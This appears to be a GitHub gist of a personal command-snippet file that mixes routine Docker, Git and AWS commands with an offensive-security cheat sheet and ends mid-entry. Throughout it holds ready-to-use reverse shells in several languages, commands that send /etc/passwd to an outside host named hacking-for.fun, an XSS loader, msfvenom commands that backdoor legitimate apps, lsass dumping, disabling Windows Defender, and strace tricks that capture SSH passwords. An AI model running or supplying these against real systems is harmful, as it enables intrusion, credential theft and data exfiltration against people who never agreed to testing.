Last active
April 19, 2024 00:13
-
-
Save rhamaa/cef3fb330cb754f307ef356782a1376d to your computer and use it in GitHub Desktop.
description
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [[snippets]] | |
| description = "Python PTY Bash" | |
| command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] Socat Reverse Shell" | |
| command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] Bash Reverse Shell" | |
| command = "bash -i >& /dev/tcp/<HOST>/<PORT=2121> 0>&1" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] Python Reverse Shell" | |
| command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<HOST>\",<PORT=2121>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] Netcat Without -e Reverse Shell" | |
| command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HOST> <PORT=2121> >/tmp/f" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Reverse Shell] PHP Reverse Shell" | |
| command = "php -r '$sock=fsockopen(\"<HOST>\",<PORT=2121>);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Misc] Increase Virtual Memory Size" | |
| command = "sysctl -w vm.max_map_count=262144" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Wget] Wget Recursive Download" | |
| command = "wget -r -e robots=off http://ezfile-sharing.wargames.my/.git" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[GIT] Git hard reset .git to source codes have been rebuilt in the directory" | |
| command = "git reset --hard" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Misc] Generate favicon hash" | |
| command = "python3 -c \"import mmh3,sys;import requests;import codecs;response = requests.get(sys.argv[1]);favicon = codecs.encode(response.content,'base64');hash = mmh3.hash(favicon);print(hash)\"" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Recon] Gau -subs" | |
| command = "echo DOMAIN | gau -subs | grep -vE \"(\\.png|\\.jpg|\\.svg|\\.woff|\\.tff)\" | sort -u" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Recon] go-dork chained with nuclei" | |
| command = "go-dork -q \"inurl:'/secure' intext:'jira' site:org\" -s | nuclei -t workflows/jira-workflow.yaml" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Dev] Gunicorn servce django project" | |
| command = "gunicorn {{project_name}}.wsgi:application --bind 127.0.0.1:8083 --log-level=info --log-file=- --workers 2 --user=rhama" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[GIT] List all cloned git directories on system" | |
| command = "find / -name \".git\" -execdir git remote get-url origin \\; 2>/dev/null" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Delete all running and stopped containers" | |
| command = "docker container rm -f $(docker ps -aq)" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Print the last 100 lines of a container’s logs" | |
| command = "docker container logs --tail 100 {{container_name}}" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Remove all images" | |
| command = "docker rmi -f $(docker images -a -q)" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Remove all unused data including: image, network, stop container" | |
| command = "docker system prune" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Remove all untagged images" | |
| command = "docker rmi $(docker images --filter \"dangling=true\" -q --no-trunc) --force" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Docker] Stop all running containers" | |
| command = "docker stop $(docker ps -aq)" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[OS] Set Multi-user Systemd Boot Target" | |
| command = "sudo systemctl set-default multi-user.target" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Nmap] nmap verbose scan" | |
| command = "nmap -v -sS -A -T4 <HOST>" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[Find] Delete all .pyc files" | |
| command = "find . -type f -name \"*.pyc\" | xargs rm -rf" | |
| output = "\"\"" | |
| [[snippets]] | |
| description = "[GIT] Undo git add before commit in specific filename" | |
| command = "git reset filename" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Unstage all changes" | |
| command = "git reset" | |
| output = "" | |
| [[snippets]] | |
| description = "XSSHunter Payload" | |
| command = "\"><script src=https://htmlentities.xss.ht></script>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] CTF Socket Listen" | |
| command = "socat -d -d -d TCP4-LISTEN:60004,reuseaddr,fork EXEC:\"/usr/bin/python random-string-generator2.py\" > /dev/null 2>&1 &" | |
| output = "" | |
| [[snippets]] | |
| description = "[Find] SUID Binary" | |
| command = "find /* -user root -perm -4000 -print 2>/dev/null" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap] Simple Port Knocking" | |
| command = "for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x <HOST>; done" | |
| output = "" | |
| [[snippets]] | |
| description = "[Hydra] Brute force ssh with wordlist" | |
| command = "hydra -L <user-list.txt> -P <password-list.txt> ssh://<HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Hydra] Brute force ftp" | |
| command = "hydra -V -l admin -P passwords.txt -e ns -f -s 21 <HOST> ftp" | |
| output = "" | |
| [[snippets]] | |
| description = "[Android] Jarsigner build APK" | |
| command = "jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore ~/.android/debug.keystore -storepass android <APK_NAME> androiddebugkey" | |
| output = "" | |
| [[snippets]] | |
| description = "[Android] Zipalign APK" | |
| command = "zipalign -v 4 <APK_NAME> <NEW_APK_NAME>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Frida] Hook Android Apps" | |
| command = "frida -U -l <SCRIPT_NAME=crypto_hook.js> -p $(adb shell ps | grep -i <PACKAGE=com.finshell.fintech> | awk '{print $2}')" | |
| output = "" | |
| [[snippets]] | |
| description = "[Reccon] Collecting urls + test ssrf" | |
| command = "gau domain.com | urlive | grep -E '(callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|p=|q=|query=|search=|id=|item=|page_id=|secret=|url=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_urllogin_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|cmd=|ip=|ping=|lang=|edit=|LoginId=|size=|signature=|passinfo=)' | qsreplace EnterYourBurpCollabrator | concurl" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mac] Enable ZSH Completion" | |
| command = "autoload -Uz compinit && compinit" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mac] Disable Char Popup while holding key" | |
| command = "defaults write -g ApplePressAndHoldEnabled -bool false" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mac] Enable Char Popup while holding key" | |
| command = "efaults write -g ApplePressAndHoldEnabled -bool true" | |
| output = "" | |
| [[snippets]] | |
| description = "[Python] Simple FTP Server" | |
| command = "python3 -m pyftpdlib -p 21" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Backdooring Apps" | |
| command = "msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap] Script Vuln Scanning" | |
| command = "nmap -Pn -sV -sC --script vuln -T4 <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap] Decoy scan -D with list of live host" | |
| command = "nmap –D 192.168.75.10,192.168.75.11,192.168.75.1,ME -p 80,21,22,25,443 -Pn <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] Bind port to executable" | |
| command = "socat TCP-LISTEN:5000,reuseaddr,fork EXEC:\"python3 main.py\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Android] Disable verify adb install" | |
| command = "adb shell settings put global verifier_verify_adb_installs 0" | |
| output = "" | |
| [[snippets]] | |
| description = "[Android] Disable package verify" | |
| command = "adb shell settings put global package_verifier_enable 0" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap-SMB] SMB Enumeration" | |
| command = "nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 10.0.0.1" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap-Mysql] Mysql Enumeration" | |
| command = "nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <HOST> -p 3306" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap-SMTP] SMTP Enumeration" | |
| command = "nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Recon-SNMP] SNMP Enumeration" | |
| command = "snmpwalk -c public -v1 <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap-FTP] FTP Enumeration:" | |
| command = "nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Hydra] Brute Force HTTP Form" | |
| command = "hydra <HOST> http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin" | |
| output = "" | |
| [[snippets]] | |
| description = "[Tunneling] Tunneling 10.10.10.0/24 throught 10.0.0.1" | |
| command = "sshuttle -r root@10.0.0.1 10.10.10.0/24" | |
| output = "" | |
| [[snippets]] | |
| description = "[Hashcat] Cracking md5" | |
| command = "hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap] General Enumeration (Verbose)" | |
| command = "nmap -vv -Pn -A -sC -sS -T 4 -p- <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] Show expiration date of SSL certificate" | |
| command = "echo | openssl s_client -connect <HOST>:443 2>/dev/null |openssl x509 -dates -noout" | |
| output = "" | |
| [[snippets]] | |
| description = "[Recon-SMB] SMB Enumeration using enum4linux" | |
| command = "enum4linux <HOST>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Aws] Get AWS Lambda Function" | |
| command = "aws lambda get-function --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester> --region <REGION=us-east-2>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get list event that triggered <FUNCTION>" | |
| command = "aws lambda list-event-source-mappings --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get lambda function policy" | |
| command = "aws lambda get-policy --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Perform Whoami to access key" | |
| command = "aws sts get-caller-identity --profile <PROFILE>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Exfiltrate] Exfiltrate using cancel" | |
| command = "cancel -u \"$(cat /etc/passwd)\" -h <HOST=hacking-for.fun:<PORT=2121>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Exfiltrate] Exfiltrate whois" | |
| command = "whois -h <HOST=hacking-for.fun> -p <PORT=2121> `cat /etc/passwd`" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get Policy Version Detail" | |
| command = "aws iam get-policy-version --policy-arn <ARN=arn:aws:iam::838475217688:policy/LambdaReadOnlyTester> --version-id v1" | |
| output = "" | |
| [[snippets]] | |
| description = "[Wget] Clone HTML Template" | |
| command = "wget --recursive --no-clobber --page-requisites --html-extension --convert-links --restrict-file-names=windows --domains website.org --no-parent <WEBSITE>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Set IAM default policy version" | |
| command = "aws iam set-default-policy-version --version-id v5 --policy-arn arn:aws:iam::838475217688:policy/cg-raynor-policy-cgidg7msogmyzq --profile raynor" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get Attached Policies on specific username" | |
| command = "aws iam list-attached-user-policies --user-name <USERNAME> --profile raynor" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get User Information" | |
| command = "aws iam get-user" | |
| output = "" | |
| [[snippets]] | |
| description = "[Python] Simple FTP Server using pyftpdlib" | |
| command = "python -m pyftpdlib -p 21 -w" | |
| output = "" | |
| [[snippets]] | |
| description = "[Python] Simple HTTP Server using SimpleHTTPServer" | |
| command = "python -m SimpleHTTPServer 80" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS-Lambda] Get Lambda Function List" | |
| command = "aws lambda list-functions --profile <PROFILE>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS-Lambda] Get Policy Of Function" | |
| command = "aws lambda get-policy --function-name <FUNCTION>" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Find the commit id of the commit that deleted your file" | |
| command = "git log --diff-filter=D --summary" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Restore Specific File from Commit" | |
| command = "git checkout <COMMIT-HASH=81eeccf>~1 <your-lost-file-name>" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Apply Specific File On Stash" | |
| command = "git checkout stash@{<INDEX=0>} -- <filename>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Reccon] Scanning IP On The Network" | |
| command = "netdiscover -i <INTERFACE=eth0>" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Diff stash specific file" | |
| command = "git diff stash@{0}^1 stash@{0} -- project/secure_code_platform/templates/core/exercise.html" | |
| output = "" | |
| [[snippets]] | |
| description = "[Python] Pretty print json" | |
| command = "python3 -m json.tool <JSON_FILE=exercises.json>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get assume role of specific service" | |
| command = "aws --profile test2 iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 \"ec2.amazonaws.com\" | grep -v \"ec2.amazonaws.com\" |sort -u | uniq" | |
| output = "" | |
| [[snippets]] | |
| description = "for i in $(cat /etc/passwd | fold -w 100 | xxd -ps); do ping $i.<domain=hacking-for.fun>;done" | |
| command = "[Exfiltrate] DNS Exfiltrate Via Ping" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Show UserData of EC2 Instance" | |
| command = "aws ec2 describe-instance-attribute --attribute userData --instance-id i-0a0fd26b0e9fdd85b --profile student --region eu-west-2" | |
| output = "" | |
| [[snippets]] | |
| description = "[CLI] Rot 13 Decode" | |
| command = "echo \"AAA\" | tr 'A-Za-z' 'N-ZA-Mn-za-m'" | |
| output = "" | |
| [[snippets]] | |
| description = "[ImageMagick] Compress Jpeg File" | |
| command = "convert -strip -interlace Plane -gaussian-blur 0.05 -quality 85% <SRC=source.jpg> <DST=dst.jpg>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Powershell] Disable Windows Defender" | |
| command = "Set-MpPreference -DisableRealtimeMonitoring $true" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows-Wmic] Installed Security Patch List on machine" | |
| command = "wmic qfe list" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows-Wmic] Get Single Process PID" | |
| command = "wmic process where \"name='<PROC_NAME=lsass.exe>'\" get processid" | |
| output = "" | |
| [[snippets]] | |
| description = "[SSH] Forwarding local port to remote host" | |
| command = "ssh -N -v -R <REMOTE_PORT>:<LOCAL_IP>:<LOCAL_PORT> rhama@hacking-for.fun" | |
| output = "" | |
| [[snippets]] | |
| description = "[Iptables] Allow only specific IP to DST Port" | |
| command = "/sbin/iptables -A INPUT -p tcp ! -s <ALLOWED_IP=192.168.56.102> --dport <DST_PORT=8083> -j DROP" | |
| output = "" | |
| [[snippets]] | |
| description = "[Iptables] DROP Incoming connection to DST_PORT" | |
| command = "/sbin/iptables -A INPUT -p tcp --destination-port <DST_PORT=8080> -j DROP" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mac] Netstat linux like alternative" | |
| command = "sudo lsof -i -n -P" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] Use aes-128-cbc algorithm to encrypt files" | |
| command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] Use the aes-128-cbc algorithm to decrypt the file" | |
| command = "openssl enc -d -aes-128-cbc -in enc_abc.txt -out abc.txt" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] Use the aes-128-cbc algorithm to encrypt files without interactive input password" | |
| command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt -pass pass:123456" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] Use encryption algorithm aes-256-cbc and password file to encrypt large files" | |
| command = "openssl enc -aes-256-cbc -salt -in largefile.pdf -out largefile.pdf.enc" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mac] Monitoring File System Event" | |
| command = "fs_usage -w -filesystem" | |
| output = "" | |
| [[snippets]] | |
| description = "[Tshark] Logging DNS Query Name" | |
| command = "tshark -Y \"udp.dstport==53\" -T fields -e \"dns.qry.name\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Docker] Inspect network on running container" | |
| command = "docker inspect <CONTAINER=my-ubuntu> -f \"{{json .NetworkSettings.Networks }}\" | jq" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Execute Windows Command - generate dll named shell32.dll that will pop calc when ran" | |
| command = "msfvenom -f dll -p windows/exec CMD=\"C:\\windows\\system32\\calc.exe\" -o shell32.dll" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Windows DLL with Windows cmd" | |
| command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Executable with Windows cmd" | |
| command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Executable with Meterpreter" | |
| command = "msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe" | |
| output = "" | |
| [[snippets]] | |
| description = "[MSF] Generate raw win 64 exec CMD" | |
| command = "msfvenom -p windows/x64/exec CMD=<CMD=calc.exe> -f raw -o <NAME=shellcode.bin> -a x64" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Dump process using a native comsvcs.dll" | |
| command = "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump <PID=624> <OUTPUT=C:\\temp\\lsass.dmp> full" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Encode file using certutil format" | |
| command = "certutil -encode <IN_FILE=shellcode.bin> <OUT_FILE=shellcode.encode>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Attach Instance Profile to EC2 Instance" | |
| command = "aws ec2 associate-iam-instance-profile --iam-instance-profile Name=S3ReadOnlyAccess-Role --instance i-0fe5acf4cdf179193 --profile bt --region us-east-2" | |
| output = "" | |
| [[snippets]] | |
| description = "[SSRF] Cloud Metadata" | |
| command = "https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get inline role policy" | |
| command = "aws iam get-role-policy --role-name <ROLE_NAME=Test-Role> --policy-name <POLICY_NAME=ExamplePolicy>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get role details" | |
| command = "aws iam get-role --role-name <ROLE_NAME=Test-Role>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get managed policy list for specific role" | |
| command = "aws iam list-attached-role-policies --role-name <ROLE_NAME=AWSServiceRoleForSupport>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get inline policies for specific role" | |
| command = "aws iam list-role-policies --role-name <ROLE_NAME=Test-Role>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get all instances status" | |
| command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId]' --output text" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] VPC CidrBlock list" | |
| command = "aws ec2 describe-vpcs --region us-east-2 --output table --query \"Vpcs[*].[CidrBlock,IsDefault,VpcId]\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] EC2 List summary" | |
| command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId, VpcId, NetworkInterfaces[*].Groups, PrivateIpAddress,PrivateDnsName, PublicIpAddress, PublicDnsName]' --region us-east-2 --output yaml" | |
| output = "" | |
| [[snippets]] | |
| description = "[Recon] Collect All repository name github" | |
| command = "for i in {1..9}; do curl -k \"https://github.com/<TARGET=kitabisa>?page=$i\" | grep '/<TARGET=kitabisa>' | grep mr-3 | awk '{print $2}' 2>/dev/null >> tmp; done && cat tmp | cut -d \"/\" -f 3 | sort -u > github-repo.txt" | |
| output = "" | |
| [[snippets]] | |
| description = "[Payload] Java Runtime.exec sh command execute" | |
| command = "sh -c $@|sh . echo ls -la / | nc <IP=hacking-for.fun> 2121" | |
| output = "" | |
| [[snippets]] | |
| description = "[OS] Set time to use NTP" | |
| command = "$ sudo apt install ntpdate $ sudo ntpdate -s ntp.ubuntu.com $ sudo dpkg-reconfigure tzdata" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Start Applocker service" | |
| command = "sc config \"AppIDSvc\" start=auto & net start \"AppIDSvc\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Nmap] Scanning large network using nmap : Scanning 676,352 IP Addresses in 46 Hours" | |
| command = "https://nmap.org/book/mayo-scan.html" | |
| output = "" | |
| [[snippets]] | |
| description = "Upgrading Simple Shells to Fully Interactive TTYs" | |
| command = "https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" | |
| output = "" | |
| [[snippets]] | |
| description = "Kernel Module Reverse Shell" | |
| command = "https://gist.githubusercontent.com/wifisecguy/b13adadbe67985804c3000c45521e2f7/raw/19d4a13cb9f55b253e7cf8ed9c4960d1a4920117/reverse-shell.c" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] View NACL on Specific Subnet" | |
| command = "aws ec2 describe-network-acls --filter \"Name=association.subnet-id,Values=<SUBNET_ID=subnet-1ae9df57>\" --query NetworkAcls[].Entries --output table --color off" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Summary of RDS instance" | |
| command = "aws rds describe-db-instances --filter --query DBInstances[].[DBInstanceIdentifier,MasterUsername,DBSubn etGroup.VpcId,Endpoint.Address] --output=table --color off" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Find VPC id by CIDR block" | |
| command = "aws ec2 describe-vpcs --filter \"Name=cidrBlock,Values=<CIDR=172.31.0.0/16>\" --query Vpcs[].VpcId --output table --color off" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Find all open outbond Security Groups" | |
| command = "aws ec2 describe-security-groups --filter \"Name=egress.ip-permission.cidr,Values='0.0.0.0/0',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId" | |
| output = "" | |
| [[snippets]] | |
| description = "[LINUX] Stop systemd-resolved" | |
| command = "sudo systemctl disable systemd-resolved" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Push public key to EC2 instance via EC2 connect" | |
| command = "aws ec2-instance-connect send-ssh-public-key --instance-id <INSTANCE=i-0989ec3292613a4f9> --availability-zone <AVAILABILITY_ZONE=us-east-2b> --instance-os-user <USERNAME=ubuntu> --ssh-public-key file://id_rsa.pub --region us-east-2" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Execute shell script on specific EC2 Instance via SSM" | |
| command = "aws ssm send-command --document-name \"AWS-RunShellScript\" --document-version \"1\" --targets '[{\"Key\":\"InstanceIds\",\"Values\":[<INSTANCE_ID=\"i-049ce383acf05967d\">]}]' --parameters '{\"workingDirectory\":[\"\"],\"executionTimeout\":[\"3600\"],\"commands\":[\"echo \\\"Hello\\\" > /tmp/ssm_hello.txt\"]}' --timeout-seconds 600 --max-concurrency \"50\" --max-errors \"0\" --region us-east-2" | |
| output = "" | |
| [[snippets]] | |
| description = "[Cheatsheet] SSRF Cheatsheet" | |
| command = "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] SSM Command result" | |
| command = "aws ssm list-command-invocations --command-id <COMMAND_ID=ea37f13d-e4ef-48e4-87a0-0dc14d921266>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get EC2 Instance ID" | |
| command = "aws ec2 describe-instances --region us-east-1 --output table --query 'Reservations[*].Instances[*].InstanceId'" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Create IAM role AssumeRole Policy" | |
| command = "aws iam create-role --role-name <ROLE_NAME=EC2-Admin-Role> --assume-role-policy-document file://ec2-role-trust-policy.json" | |
| output = "" | |
| [[snippets]] | |
| description = "[Reverse Shell] Bash reverse shell, please check existence of /dev/pts/X first" | |
| command = "telnet 127.0.0.1 2121 0<<DEV_NAME_1=/dev/pts/0> | /bin/bash &><DEV_NAME_2=/dev/pts/2>" | |
| output = "" | |
| [[snippets]] | |
| description = "[SSH] SSH Remote Port Forwarding" | |
| command = "ssh -R <LOCAL_PORT=2121>:localhost:<SERVER_PORT=2121> do -v -N" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] Forward TCP Traffic to TARGET_SERVER" | |
| command = "socat TCP4-LISTEN:2121,fork TCP4:<TARGET_SERVER=192.168.56.108:4782>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Backdooring stdin command using strace" | |
| command = "alias <COMMAND=ssh>='strace -f -e trace=read,write -o /tmp/.ssh.log -s 32 ssh'" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Record the plaintext password of the sshd process" | |
| command = "sudo strace -f -F -p `ps aux|grep \"sshd -D\"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2>/tmp/sshd_log" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] Socat Cheatsheet" | |
| command = "https://blog.travismclarke.com/post/socat-tutorial/" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] Debugging Unix Socket by forwarding" | |
| command = "socat -v UNIX-LISTEN:/tmp/socat-listen UNIX-CONNECT:/path/to/real.socket" | |
| output = "" | |
| [[snippets]] | |
| description = "[Socat] Listen to Port #nc alternative" | |
| command = "socat TCP-LISTEN:<PORT=2121>,reuseaddr,pf=ip4,fork -" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Log all stdout to file and send it to syslog" | |
| command = "exec > >(tee /tmp/user-data.log|logger -t <TYPE=user-data> -s 2>/dev/console) 2>&1" | |
| output = "" | |
| [[snippets]] | |
| description = "[Openssl] generate linux password" | |
| command = "openssl passwd -1 password" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Find File containing password" | |
| command = "find / -maxdepth 4 -name '*.conf' -type f -exec grep -Hn 'pass\\|password\\|login\\|username\\|email\\|mail\\|host\\|ip' {} \\; 2>/dev/null" | |
| output = "" | |
| [[snippets]] | |
| description = "nmap -sV -p 111 --script=rpcinfo $RHOST" | |
| command = "[Nmap-NFS] Enumerate RPC NFS using nmap" | |
| output = "" | |
| [[snippets]] | |
| description = "[GDB] Python script for side channel attack using gdb" | |
| command = "https://gist.github.com/rhamaa/8e44db88eed2da0d259540b1362b29c4" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Generate httpasswd password" | |
| command = "echo \"admin:`openssl passwd -apr1 YourPassword`\" | sudo tee -a /etc/nginx/htpasswd.kibana" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] List all private AMI's, ImageId and Name tags" | |
| command = "aws ec2 describe-images --filter \"Name=is-public,Values=false\" --query 'Images[].[ImageId, Name]' --output text | sort -k2" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Checkout specifik file di commit ID" | |
| command = "git checkout [commit ID] -- path/to/file" | |
| output = "" | |
| [[snippets]] | |
| description = "[Wget] Download files recursively" | |
